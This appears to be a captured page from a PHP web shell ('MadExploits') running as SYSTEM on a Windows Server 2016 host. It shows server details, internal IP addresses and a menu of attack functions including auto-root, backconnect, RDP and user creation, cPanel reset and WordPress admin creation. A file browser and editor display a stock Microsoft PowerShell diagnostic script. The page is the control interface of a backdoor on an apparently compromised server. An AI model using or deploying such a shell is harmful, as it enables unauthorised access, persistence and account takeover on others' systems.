Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
Windows /
diagnostics /
system /
WindowsUpdate /
[ HOME SHELL ]
Name
Size
Permission
Action
en-US
[ DIR ]
drwxrwxrwx
CL_Invocation.ps1
1.2
KB
-rw-rw-rw-
DiagPackage.diagpkg
9.06
KB
-rw-rw-rw-
DiagPackage.dll
77
KB
-rw-rw-rw-
RC_DataStore.ps1
605
B
-rw-rw-rw-
RC_DateTime.ps1
4.09
KB
-rw-rw-rw-
RC_appdata.ps1
576
B
-rw-rw-rw-
RES_APPDATA.ps1
281
B
-rw-rw-rw-
RES_GENWUError.ps1
4.91
KB
-rw-rw-rw-
RS_DataStore.ps1
5.31
KB
-rw-rw-rw-
RS_DateTime.ps1
1.73
KB
-rw-rw-rw-
TS_Main.ps1
1.5
KB
-rw-rw-rw-
VF_DataStore.ps1
867
B
-rw-rw-rw-
V_GenWUError.ps1
813
B
-rw-rw-rw-
cl_Service.ps1
7.3
KB
-rw-rw-rw-
cl_mutexverifiers.ps1
17.71
KB
-rw-rw-rw-
cl_security.ps1
37.09
KB
-rw-rw-rw-
cl_windowsupdate.ps1
9.82
KB
-rw-rw-rw-
cl_windowsversion.ps1
20.61
KB
-rw-rw-rw-
rc_genwuerror.ps1
556
B
-rw-rw-rw-
utils_PowerShell_1_0.ps1
6.35
KB
-rw-rw-rw-
utils_SetupEnv.ps1
29.74
KB
-rw-rw-rw-
utils_reporting.ps1
4.07
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : utils_PowerShell_1_0.ps1
# Copyright © 2012, Microsoft Corporation. All rights reserved. function Get-MATSTemp() { $CABDirs = get-childitem "$env:temp\mats-temp\cab*.*" if ($CABDirs.count -gt 0) { $CABDirs = Sort-Object -InputObject $CABDirs -Property LastWriteTime -Descending return $CabDirs[0] } else { return $CABDirs } } # Our implementation of a .PSD1 importer function Import-LocalizedData($FileName, $BindingVariable, $BaseDirectory, $UICulture) { if ($baseDirectory -eq $null) { $base= "$pwd" } else { $base = $basedirectory } $mats = Get-MATSTemp if ($UICulture -ne $null) { $culture = $UICulture } else { $culture = (get-culture).name } $locations = "$base\$culture", "$mats\$culture", "$base", "$mats" foreach ($location in $locations) { if ([System.IO.File]::Exists("$location\$filename.psd1")) { $fullpath = "$location\$filename.psd1" break } } if (![System.IO.File]::Exists($fullpath)) { throw "File not Found: $fullpath" # Write to error output } $stringtable = "" | Select-Object StringTableFileName # Return object $sourceStrings = [System.IO.File]::ReadAllLines($fullpath) # Array of strings in .PSD1 file $stringtable.StringTableFileName = $filename # Place the filename in the stringtable for ($i = 0; $i -lt $sourceStrings.count; $i++) # Loop over all strings { if ($sourceStrings[$i].contains("=")) # Simple check for "xx=yy" pattern { $stringID = $sourceStrings[$i].Substring(0, $sourceStrings[$i].IndexOf("=")) # Get String ID $stringValue = $sourceStrings[$I].SubString($SourceStrings[$i].IndexOf("=")+1) # Get String Value add-member -inputobject $StringTable -membertype noteproperty -name $stringID -value $stringValue # Add this StringID/Value to the return object } } set-variable -Name $bindingvariable -Value $stringtable -Scope "global" # 'return' the completed string table } # Import-LocalizedData # Simple implementation of PowerShell 2.0 add-type cmdlet function Add-Type { param([string]$TypeDefinition, [Array]$ReferencedAssemblies, [switch]$passthru) # Create Provider $csprovider = new-object Microsoft.CSharp.CSharpCodeProvider # Configure the compiler $CompilerParams = new-object System.CodeDom.Compiler.CompilerParameters $CompilerParams.GenerateInMemory = $true # Add some default assemblies $CompilerParams.ReferencedAssemblies.Add("system.dll") > $null $CompilerParams.ReferencedAssemblies.Add([PSObject].assembly.location) > $null # add user-defined assemblies if ($referencedassemblies.count -gt 0) { for ($i = 0; $i -lt $referencesassemblies.count; $i++) { $CompilerParams.ReferencedAssemblies.Add($ReferencedAssemblies[$i]) } } # compile the code $Result = $csprovider.compileAssemblyFromSource($CompilerParams, $TypeDefinition) # check for success if ($Result.errors.count -gt 0) { write-error $Result } else { if ($passthru) { $Result.compiledassembly.getexportedtypes() } } } # Simple implentation of ConvertTo-XML function ConvertTo-XML { Param($InputObject) Begin { $xmlSource = "" $xmlSource += "<?xml version=""1.0""?><Objects>" } Process { if ($_) { $InputObjectType = $_.GetType.TypeNameOfValue $xmlsource += "<Object Type=""System.Management.Automation.PSCustomObject"">" #$xmlSource = "" #$xmlSource += "<?xml version=""1.0""?><Objects><Object Type=""System.Management.Automation.PSCustomObject"">" $Properties = @() if ((Get-Member -inputobject $_ -MemberType Property) -ne $null ){ $Properties += Get-Member -inputobject $_ -MemberType Property } if ((Get-Member -inputobject $_ -MemberType NoteProperty) -ne $null ){ $Properties += Get-Member -inputobject $_ -MemberType NoteProperty } $specialChars = @{"Source"="<";Dest="<"}, @{"Source"=">";Dest=">"}, @{"Source"="&";Dest="&"} for ($PropertyCount = 0; $PropertyCount -lt $Properties.Count; $PropertyCount++) { [string]$PropName = $Properties[$PropertyCount].Name [string]$PropDef = $Properties[$PropertyCount].Definition [string]$PropType = $PropDef.Split(" ")[0] [string]$Value = $_.$PropName foreach ($entry in $specialChars) { $Value = $Value.Replace($Entry.Source, $Entry.Dest) } $xmlSource += "<Property Name=""$PropName"" Type=""$PropType"">$Value</Property>" } #$xmlSource += "</Object></Objects>" $xmlSource += "</Object>" #$xmlSource } } End { if ($InputObject) { $InputObjectType = $InputObject.GetType.TypeNameOfValue $xmlSource = "" $xmlSource += "<?xml version=""1.0""?><Objects><Object Type=""System.Management.Automation.PSCustomObject"">" if ((Get-Member -inputobject $InputObject -MemberType Property) -ne $null ){$Properties = Get-Member -inputobject $InputObject -MemberType Property } if ((Get-Member -inputobject $InputObject -MemberType NoteProperty) -ne $null ){$Properties += Get-Member -inputobject $InputObject -MemberType NoteProperty } $specialChars = @{"Source"="<";Dest="<"}, @{"Source"=">";Dest=">"}, @{"Source"="""";Dest="""}, @{"Source"="&";Dest="&"} for ($PropertyCount = 0; $PropertyCount -lt $Properties.Count; $PropertyCount++) { [string]$PropName = $Properties[$PropertyCount].Name [string]$PropDef = $Properties[$PropertyCount].Definition [string]$PropType = $PropDef.Split(" ")[0] [string]$Value = $InputObject.$PropName foreach ($entry in $specialChars) { $Value = $Value.Replace($Entry.Source, $Entry.Dest) } $xmlSource += "<Property Name=""$PropName"" Type=""$PropType"">$Value</Property>" } $xmlSource += "</Object></Objects>" $xmlSource } else { $xmlSource += "</Objects>" $xmlSource } } } ########### # Pop up window ############ function Pop-Msg { param([string]$msg ="message", [string]$ttl = "Title", [int]$type = 64) $popwin = new-object -comobject wscript.shell $null = $popwin.popup($msg,0,$ttl,$type) remove-variable popwin }
Close